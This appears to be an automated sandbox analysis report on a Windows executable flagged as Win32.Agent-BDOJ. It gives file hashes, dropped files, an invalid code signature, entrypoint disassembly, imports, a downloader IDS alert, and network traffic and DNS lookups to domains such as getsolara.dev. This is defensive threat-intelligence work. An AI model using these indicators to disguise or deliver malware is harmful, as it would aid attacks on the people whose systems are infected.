                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yubbopbg.ui0.ps1

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                            C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1835008
                                                                                                                                                                                                                            Entropy (8bit):4.394157599951799
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6144:Cl4fiJoH0ncNXiUjt10q0G/gaocYGBoaUMMhA2NX4WABlBuNAAOBSqa:S4vF0MYQUMM6VFYSAU
                                                                                                                                                                                                                            MD5:6C679AE2BC67F9C0D2933070D23B6299
                                                                                                                                                                                                                            SHA1:AE90070E5D3E3CA4BCE56631928A869FF76DB0DA
                                                                                                                                                                                                                            SHA-256:133BD15DA8AD3F679C6D9C3D79C4D44D745383D085C900E4D66346B562C9DD78
                                                                                                                                                                                                                            SHA-512:F9CE444448349B6A13CDEF4AE79945F15AEDBD986F090D95E939D32F7E4AAF9FDBEBD3BD5433510F8EF6CB6A30FC6D365617D41D159F5E4C872D8D7510913CD5
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.<..(..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            \Device\ConDrv

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):97
                                                                                                                                                                                                                            Entropy (8bit):4.331807756485642
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:lyAZFXZDLsFzAXmZrCZDL4QXAVJK4v:lyqBtoJAXmoZDL4CA1v
                                                                                                                                                                                                                            MD5:195D02DA13D597A52F848A9B28D871F6
                                                                                                                                                                                                                            SHA1:D048766A802C61655B9689E953103236EACCB1C7
                                                                                                                                                                                                                            SHA-256:ADE5C28A2B27B13EFB1145173481C1923CAF78648E49205E7F412A2BEFC7716A
                                                                                                                                                                                                                            SHA-512:1B9EDA54315B0F8DB8E43EC6E78996464A90E84DE721611647E8395DBE259C282F06FB6384B08933F8F0B452B42E23EE5A7439974ACC5F53DAD64B08D39F4146
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:..Service Version: 0.0.0.0..Engine Version: 0.0.0.0....No engine/signature is currently loaded...

                                                                                                                                                                                                                            Static File Info

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Entropy (8bit):7.993796413048127
                                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                                            • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                                                                            • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                            File name:SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                                                                                                                                                                                                                            File size:8'240'610 bytes
                                                                                                                                                                                                                            MD5:3c1b1f453e5f9f0d71f7862d2d6235fe
                                                                                                                                                                                                                            SHA1:2092b1b88e17b165ea635b136aceecb05c54e042
                                                                                                                                                                                                                            SHA256:984156f2a09823ce55d34fab0738e81d086b4599dbba3b1f6282aa3cce64524a
                                                                                                                                                                                                                            SHA512:effef144d925e8aeb8e499331b339a7341709b2e443dd29df0dd36a59d9f9e1321d7e14089f7cd0f3eecf86f225e755d12a23eb74d75cdfda508a67ce7a56431
                                                                                                                                                                                                                            SSDEEP:196608:5QHY8OewfI9jUCzi4H1qSiXLGVi7DMgpZ3Q0VMwICEc/jF:7VIHziK1piXLGVE4Ue0VJB
                                                                                                                                                                                                                            TLSH:C68633016A8009F6F6F78A3D88929419C4B336A217A0D6FF131CD2790EA35FA5D36777
                                                                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n=..*\.Z*\.Z*\.Za$.[-\.Za$.[.\.Za$.[ \.Z:..Z)\.Z:..[#\.Z:..[;\.Z:..[.\.Za$.[!\.Z*\.Z.\.Zb..[3\.Zb..[+\.ZRich*\.Z........PE..d..

                                                                                                                                                                                                                            File Icon

                                                                                                                                                                                                                            Icon Hash:00928e8e8686b000

                                                                                                                                                                                                                            Static PE Info

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Entrypoint:0x14000cdb0
                                                                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                                                                            Digitally signed:true
                                                                                                                                                                                                                            Imagebase:0x140000000
                                                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                            Time Stamp:0x671D2D88 [Sat Oct 26 17:57:28 2024 UTC]
                                                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                                            OS Version Major:6
                                                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                                                            File Version Major:6
                                                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                                                            Subsystem Version Major:6
                                                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                                                            Import Hash:72c4e339b7af8ab1ed2eb3821c98713a

                                                                                                                                                                                                                            Authenticode Signature

                                                                                                                                                                                                                            Signature Valid:false
                                                                                                                                                                                                                            Signature Issuer:CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
                                                                                                                                                                                                                            Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                            Error Number:-2146869232
                                                                                                                                                                                                                            Not Before, Not After
                                                                                                                                                                                                                            • 29/09/2021 01:00:00 29/09/2024 00:59:59
                                                                                                                                                                                                                            Subject Chain
                                                                                                                                                                                                                            • CN=Akeo Consulting, O=Akeo Consulting, S=Donegal, C=IE, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=IE, SERIALNUMBER=407950
                                                                                                                                                                                                                            Version:3
                                                                                                                                                                                                                            Thumbprint MD5:5C82B2D08EFE6EE0794B52D4309C5F37
                                                                                                                                                                                                                            Thumbprint SHA-1:3DBC3A2A0E9CE8803B422CFDBC60ACD33164965D
                                                                                                                                                                                                                            Thumbprint SHA-256:60E992275CC7503A3EBA5D391DB8AEAAAB001402D49AEA3F7F5DA3706DF97327
                                                                                                                                                                                                                            Serial:00BFB15001BBF592D4962A7797EA736FA3

                                                                                                                                                                                                                            Entrypoint Preview

                                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            sub esp, 28h
                                                                                                                                                                                                                            call 00007F088532C1ECh
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            add esp, 28h
                                                                                                                                                                                                                            jmp 00007F088532BE0Fh
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            sub esp, 28h
                                                                                                                                                                                                                            call 00007F088532C5B8h
                                                                                                                                                                                                                            test eax, eax
                                                                                                                                                                                                                            je 00007F088532BFB3h
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            mov eax, dword ptr [00000030h]
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            mov ecx, dword ptr [eax+08h]
                                                                                                                                                                                                                            jmp 00007F088532BF97h
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            cmp ecx, eax
                                                                                                                                                                                                                            je 00007F088532BFA6h
                                                                                                                                                                                                                            xor eax, eax
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            cmpxchg dword ptr [0003577Ch], ecx
                                                                                                                                                                                                                            jne 00007F088532BF80h
                                                                                                                                                                                                                            xor al, al
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            add esp, 28h
                                                                                                                                                                                                                            ret
                                                                                                                                                                                                                            mov al, 01h
                                                                                                                                                                                                                            jmp 00007F088532BF89h
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            sub esp, 28h
                                                                                                                                                                                                                            test ecx, ecx
                                                                                                                                                                                                                            jne 00007F088532BF99h
                                                                                                                                                                                                                            mov byte ptr [00035765h], 00000001h
                                                                                                                                                                                                                            call 00007F088532B6E5h
                                                                                                                                                                                                                            call 00007F088532C9D0h
                                                                                                                                                                                                                            test al, al
                                                                                                                                                                                                                            jne 00007F088532BF96h
                                                                                                                                                                                                                            xor al, al
                                                                                                                                                                                                                            jmp 00007F088532BFA6h
                                                                                                                                                                                                                            call 00007F08853394EFh
                                                                                                                                                                                                                            test al, al
                                                                                                                                                                                                                            jne 00007F088532BF9Bh
                                                                                                                                                                                                                            xor ecx, ecx
                                                                                                                                                                                                                            call 00007F088532C9E0h
                                                                                                                                                                                                                            jmp 00007F088532BF7Ch
                                                                                                                                                                                                                            mov al, 01h
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            add esp, 28h
                                                                                                                                                                                                                            ret
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            inc eax
                                                                                                                                                                                                                            push ebx
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            sub esp, 20h
                                                                                                                                                                                                                            cmp byte ptr [0003572Ch], 00000000h
                                                                                                                                                                                                                            mov ebx, ecx
                                                                                                                                                                                                                            jne 00007F088532BFF9h
                                                                                                                                                                                                                            cmp ecx, 01h
                                                                                                                                                                                                                            jnbe 00007F088532BFFCh
                                                                                                                                                                                                                            call 00007F088532C52Eh
                                                                                                                                                                                                                            test eax, eax
                                                                                                                                                                                                                            je 00007F088532BFBAh
                                                                                                                                                                                                                            test ebx, ebx
                                                                                                                                                                                                                            jne 00007F088532BFB6h
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            lea ecx, dword ptr [00035716h]
                                                                                                                                                                                                                            call 00007F08853392E2h

                                                                                                                                                                                                                            Data Directories

                                                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x3ca5c0x78.rdata
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x470000x948.rsrc
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x440000x2250.pdata
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x7d999a0x2448
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x480000x764.reloc
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x3a0800x1c.rdata
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x39f400x140.rdata
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x2b0000x4a0.rdata
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                            Sections

                                                                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                            .text0x10000x29f000x2a0002a7ae207b6295492e9da088072661752False0.5514439174107143data6.487454925709845IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                            .rdata0x2b0000x12a500x12c00c01bb074df560cd8e3d3866c1527a376False0.5244791666666667data5.752630761733724IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                            .data0x3e0000x53f80xe00dba0caeecab624a0ccc0d577241601d1False0.134765625data1.8392217063172436IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                            .pdata0x440000x22500x2400f5559f14427a02f0a5dbd0dd026cae54False0.470703125data5.291665041994019IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                            .rsrc0x470000x9480xa0024829056555b7eb4ad986ec49f8a9d30False0.427734375data5.103467399652208IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                            .reloc0x480000x7640x800816c68eeb419ee2c08656c31c06a0fffFalse0.5576171875data5.2809528666624175IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                            Resources

                                                                                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                            RT_VERSION0x470a00x398OpenPGP Public Key0.46195652173913043
                                                                                                                                                                                                                            RT_MANIFEST0x474380x50dXML 1.0 document, ASCII text0.4694508894044857

                                                                                                                                                                                                                            Imports

                                                                                                                                                                                                                            DLLImport
                                                                                                                                                                                                                            USER32.dllCreateWindowExW, ShutdownBlockReasonCreate, MsgWaitForMultipleObjects, ShowWindow, DestroyWindow, RegisterClassW, DefWindowProcW, PeekMessageW, DispatchMessageW, TranslateMessage, PostMessageW, GetMessageW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
                                                                                                                                                                                                                            COMCTL32.dll
                                                                                                                                                                                                                            KERNEL32.dllGetACP, IsValidCodePage, GetStringTypeW, GetFileAttributesExW, SetEnvironmentVariableW, FlushFileBuffers, GetCurrentDirectoryW, LCMapStringW, CompareStringW, FlsFree, GetOEMCP, GetCPInfo, GetModuleHandleW, MulDiv, FormatMessageW, GetLastError, GetModuleFileNameW, LoadLibraryExW, SetDllDirectoryW, CreateSymbolicLinkW, GetProcAddress, GetEnvironmentStringsW, GetCommandLineW, GetEnvironmentVariableW, ExpandEnvironmentStringsW, DeleteFileW, FindClose, FindFirstFileW, FindNextFileW, GetDriveTypeW, RemoveDirectoryW, GetTempPathW, CloseHandle, QueryPerformanceCounter, QueryPerformanceFrequency, WaitForSingleObject, Sleep, GetCurrentProcess, TerminateProcess, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LocalFree, SetConsoleCtrlHandler, K32EnumProcessModules, K32GetModuleFileNameExW, CreateFileW, FindFirstFileExW, GetFinalPathNameByHandleW, MultiByteToWideChar, WideCharToMultiByte, FlsSetValue, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, HeapReAlloc, WriteConsoleW, SetEndOfFile, CreateDirectoryW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ReadFile, GetFullPathNameW, SetStdHandle, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue
                                                                                                                                                                                                                            ADVAPI32.dllOpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
                                                                                                                                                                                                                            GDI32.dllSelectObject, DeleteObject, CreateFontIndirectW

                                                                                                                                                                                                                            Network Behavior

                                                                                                                                                                                                                            Suricata IDS Alerts

                                                                                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                            2024-10-27T18:44:34.269854+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949785172.67.203.125443TCP

                                                                                                                                                                                                                            Network Port Distribution

                                                                                                                                                                                                                            TCP Packets

                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                            Oct 27, 2024 18:44:29.826904058 CET49767443192.168.2.9172.67.203.125
                                                                                                                                                                                                                            Oct 27, 2024 18:44:29.826946974 CET44349767172.67.203.125192.168.2.9
                                                                                                                                                                                                                            Oct 27, 2024 18:44:29.827014923 CET49767443192.168.2.9172.67.203.125
                                                                                                                                                                                                                            Oct 27, 2024 18:44:29.876116037 CET49767443192.168.2.9172.67.203.125
                                                                                                                                                                                                                            Oct 27, 2024 18:44:29.876138926 CET44349767172.67.203.125192.168.2.9
                                                                                                                                                                                                                            Oct 27, 2024 18:44:30.532674074 CET4976980192.168.2.9208.95.112.1
                                                                                                                                                                                                                            Oct 27, 2024 18:44:30.538253069 CET8049769208.95.112.1192.168.2.9
                                                                                                                                                                                                                            Oct 27, 2024 18:44:30.538376093 CET4976980192.168.2.9208.95.112.1
                                                                                                                                                                                                                            Oct 27, 2024 18:44:30.538531065 CET4976980192.168.2.9208.95.112.1
                                                                                                                                                                                                                            Oct 27, 2024 18:44:30.543807983 CET8049769208.95.112.1192.168.2.9
                                                                                                                                                                                                                            Oct 27, 2024 18:44:30.548291922 CET44349767172.67.203.125192.168.2.9
                                                                                                                                                                                                                            Oct 27, 2024 18:44:30.548407078 CET49767443192.168.2.9172.67.203.125
                                                                                                                                                                                                                            Oct 27, 2024 18:44:30.597095966 CET49767443192.168.2.9172.67.203.125
                                                                                                                                                                                                                            Oct 27, 2024 18:44:30.597177982 CET44349767172.67.203.125192.168.2.9
                                                                                                                                                                                                                            Oct 27, 2024 18:44:30.597868919 CET44349767172.67.203.125192.168.2.9
                                                                                                                                                                                                                            Oct 27, 2024 18:44:30.710704088 CET49767443192.168.2.9172.67.203.125
                                                                                                                                                                                                                            Oct 27, 2024 18:44:30.882479906 CET49767443192.168.2.9172.67.203.125
                                                                                                                                                                                                                            Oct 27, 2024 18:44:30.923324108 CET44349767172.67.203.125192.168.2.9
                                                                                                                                                                                                                            Oct 27, 2024 18:44:31.074922085 CET44349767172.67.203.125192.168.2.9
                                                                                                                                                                                                                            Oct 27, 2024 18:44:31.075014114 CET44349767172.67.203.125192.168.2.9
                                                                                                                                                                                                                            Oct 27, 2024 18:44:31.075059891 CET49767443192.168.2.9172.67.203.125
                                                                                                                                                                                                                            Oct 27, 2024 18:44:31.100531101 CET49767443192.168.2.9172.67.203.125
                                                                                                                                                                                                                            Oct 27, 2024 18:44:31.137918949 CET8049769208.95.112.1192.168.2.9
                                                                                                                                                                                                                            Oct 27, 2024 18:44:31.138680935 CET4976980192.168.2.9208.95.112.1
                                                                                                                                                                                                                            Oct 27, 2024 18:44:31.144368887 CET8049769208.95.112.1192.168.2.9
                                                                                                                                                                                                                            Oct 27, 2024 18:44:31.144418955 CET4976980192.168.2.9208.95.112.1
                                                                                                                                                                                                                            Oct 27, 2024 18:44:33.470911980 CET49785443192.168.2.9172.67.203.125
                                                                                                                                                                                                                            Oct 27, 2024 18:44:33.470957994 CET44349785172.67.203.125192.168.2.9
                                                                                                                                                                                                                            Oct 27, 2024 18:44:33.471035957 CET49785443192.168.2.9172.67.203.125
                                                                                                                                                                                                                            Oct 27, 2024 18:44:33.473743916 CET49785443192.168.2.9172.67.203.125
                                                                                                                                                                                                                            Oct 27, 2024 18:44:33.473757982 CET44349785172.67.203.125192.168.2.9
                                                                                                                                                                                                                            Oct 27, 2024 18:44:34.092343092 CET44349785172.67.203.125192.168.2.9
                                                                                                                                                                                                                            Oct 27, 2024 18:44:34.092443943 CET49785443192.168.2.9172.67.203.125
                                                                                                                                                                                                                            Oct 27, 2024 18:44:34.096478939 CET49785443192.168.2.9172.67.203.125
                                                                                                                                                                                                                            Oct 27, 2024 18:44:34.096486092 CET44349785172.67.203.125192.168.2.9
                                                                                                                                                                                                                            Oct 27, 2024 18:44:34.096785069 CET44349785172.67.203.125192.168.2.9
                                                                                                                                                                                                                            Oct 27, 2024 18:44:34.098364115 CET49785443192.168.2.9172.67.203.125
                                                                                                                                                                                                                            Oct 27, 2024 18:44:34.139333010 CET44349785172.67.203.125192.168.2.9
                                                                                                                                                                                                                            Oct 27, 2024 18:44:34.269866943 CET44349785172.67.203.125192.168.2.9
                                                                                                                                                                                                                            Oct 27, 2024 18:44:34.270010948 CET44349785172.67.203.125192.168.2.9
                                                                                                                                                                                                                            Oct 27, 2024 18:44:34.270167112 CET49785443192.168.2.9172.67.203.125
                                                                                                                                                                                                                            Oct 27, 2024 18:44:34.270642042 CET49785443192.168.2.9172.67.203.125
                                                                                                                                                                                                                            Oct 27, 2024 18:44:34.588545084 CET49792443192.168.2.9128.116.123.4
                                                                                                                                                                                                                            Oct 27, 2024 18:44:34.588645935 CET44349792128.116.123.4192.168.2.9
                                                                                                                                                                                                                            Oct 27, 2024 18:44:34.588721037 CET49792443192.168.2.9128.116.123.4
                                                                                                                                                                                                                            Oct 27, 2024 18:44:34.589135885 CET49792443192.168.2.9128.116.123.4
                                                                                                                                                                                                                            Oct 27, 2024 18:44:34.589171886 CET44349792128.116.123.4192.168.2.9
                                                                                                                                                                                                                            Oct 27, 2024 18:44:35.458111048 CET44349792128.116.123.4192.168.2.9
                                                                                                                                                                                                                            Oct 27, 2024 18:44:35.458184004 CET49792443192.168.2.9128.116.123.4
                                                                                                                                                                                                                            Oct 27, 2024 18:44:35.460622072 CET49792443192.168.2.9128.116.123.4
                                                                                                                                                                                                                            Oct 27, 2024 18:44:35.460629940 CET44349792128.116.123.4192.168.2.9
                                                                                                                                                                                                                            Oct 27, 2024 18:44:35.460899115 CET44349792128.116.123.4192.168.2.9
                                                                                                                                                                                                                            Oct 27, 2024 18:44:35.461961985 CET49792443192.168.2.9128.116.123.4
                                                                                                                                                                                                                            Oct 27, 2024 18:44:35.503371000 CET44349792128.116.123.4192.168.2.9
                                                                                                                                                                                                                            Oct 27, 2024 18:44:35.921566963 CET44349792128.116.123.4192.168.2.9
                                                                                                                                                                                                                            Oct 27, 2024 18:44:35.921633005 CET44349792128.116.123.4192.168.2.9
                                                                                                                                                                                                                            Oct 27, 2024 18:44:35.921710968 CET49792443192.168.2.9128.116.123.4
                                                                                                                                                                                                                            Oct 27, 2024 18:44:35.928989887 CET49792443192.168.2.9128.116.123.4
                                                                                                                                                                                                                            Oct 27, 2024 18:44:37.598669052 CET49809443192.168.2.9104.20.23.46
                                                                                                                                                                                                                            Oct 27, 2024 18:44:37.598710060 CET44349809104.20.23.46192.168.2.9
                                                                                                                                                                                                                            Oct 27, 2024 18:44:37.599026918 CET49809443192.168.2.9104.20.23.46
                                                                                                                                                                                                                            Oct 27, 2024 18:44:37.599539995 CET49809443192.168.2.9104.20.23.46
                                                                                                                                                                                                                            Oct 27, 2024 18:44:37.599564075 CET44349809104.20.23.46192.168.2.9
                                                                                                                                                                                                                            Oct 27, 2024 18:44:38.229173899 CET44349809104.20.23.46192.168.2.9
                                                                                                                                                                                                                            Oct 27, 2024 18:44:38.229744911 CET49809443192.168.2.9104.20.23.46
                                                                                                                                                                                                                            Oct 27, 2024 18:44:38.234246016 CET49809443192.168.2.9104.20.23.46
                                                                                                                                                                                                                            Oct 27, 2024 18:44:38.234265089 CET44349809104.20.23.46192.168.2.9
                                                                                                                                                                                                                            Oct 27, 2024 18:44:38.234607935 CET44349809104.20.23.46192.168.2.9
                                                                                                                                                                                                                            Oct 27, 2024 18:44:38.236049891 CET49809443192.168.2.9104.20.23.46
                                                                                                                                                                                                                            Oct 27, 2024 18:44:38.283325911 CET44349809104.20.23.46192.168.2.9
                                                                                                                                                                                                                            Oct 27, 2024 18:44:38.698509932 CET44349809104.20.23.46192.168.2.9
                                                                                                                                                                                                                            Oct 27, 2024 18:44:38.698637962 CET44349809104.20.23.46192.168.2.9
                                                                                                                                                                                                                            Oct 27, 2024 18:44:38.698705912 CET49809443192.168.2.9104.20.23.46
                                                                                                                                                                                                                            Oct 27, 2024 18:44:38.699573040 CET49809443192.168.2.9104.20.23.46

                                                                                                                                                                                                                            UDP Packets

                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                            Oct 27, 2024 18:44:27.269191027 CET6287053192.168.2.91.1.1.1
                                                                                                                                                                                                                            Oct 27, 2024 18:44:27.289382935 CET53628701.1.1.1192.168.2.9
                                                                                                                                                                                                                            Oct 27, 2024 18:44:29.812438965 CET5778453192.168.2.91.1.1.1
                                                                                                                                                                                                                            Oct 27, 2024 18:44:29.820825100 CET53577841.1.1.1192.168.2.9
                                                                                                                                                                                                                            Oct 27, 2024 18:44:30.232682943 CET5821453192.168.2.91.1.1.1
                                                                                                                                                                                                                            Oct 27, 2024 18:44:30.528913021 CET53582141.1.1.1192.168.2.9
                                                                                                                                                                                                                            Oct 27, 2024 18:44:34.572330952 CET6273553192.168.2.91.1.1.1
                                                                                                                                                                                                                            Oct 27, 2024 18:44:34.580302000 CET53627351.1.1.1192.168.2.9
                                                                                                                                                                                                                            Oct 27, 2024 18:44:37.589793921 CET6070453192.168.2.91.1.1.1
                                                                                                                                                                                                                            Oct 27, 2024 18:44:37.598038912 CET53607041.1.1.1192.168.2.9
                                                                                                                                                                                                                            Oct 27, 2024 18:44:38.700347900 CET4918053192.168.2.91.1.1.1
                                                                                                                                                                                                                            Oct 27, 2024 18:44:38.708708048 CET53491801.1.1.1192.168.2.9
                                                                                                                                                                                                                            Oct 27, 2024 18:44:55.312655926 CET5356219162.159.36.2192.168.2.9
                                                                                                                                                                                                                            Oct 27, 2024 18:44:55.928215981 CET4971953192.168.2.91.1.1.1
                                                                                                                                                                                                                            Oct 27, 2024 18:44:55.936969042 CET53497191.1.1.1192.168.2.9

                                                                                                                                                                                                                            DNS Queries

                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                            Oct 27, 2024 18:44:27.269191027 CET192.168.2.91.1.1.10xacb4Standard query (0)blank-8rmnx.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Oct 27, 2024 18:44:29.812438965 CET192.168.2.91.1.1.10xa398Standard query (0)getsolara.devA (IP address)IN (0x0001)false
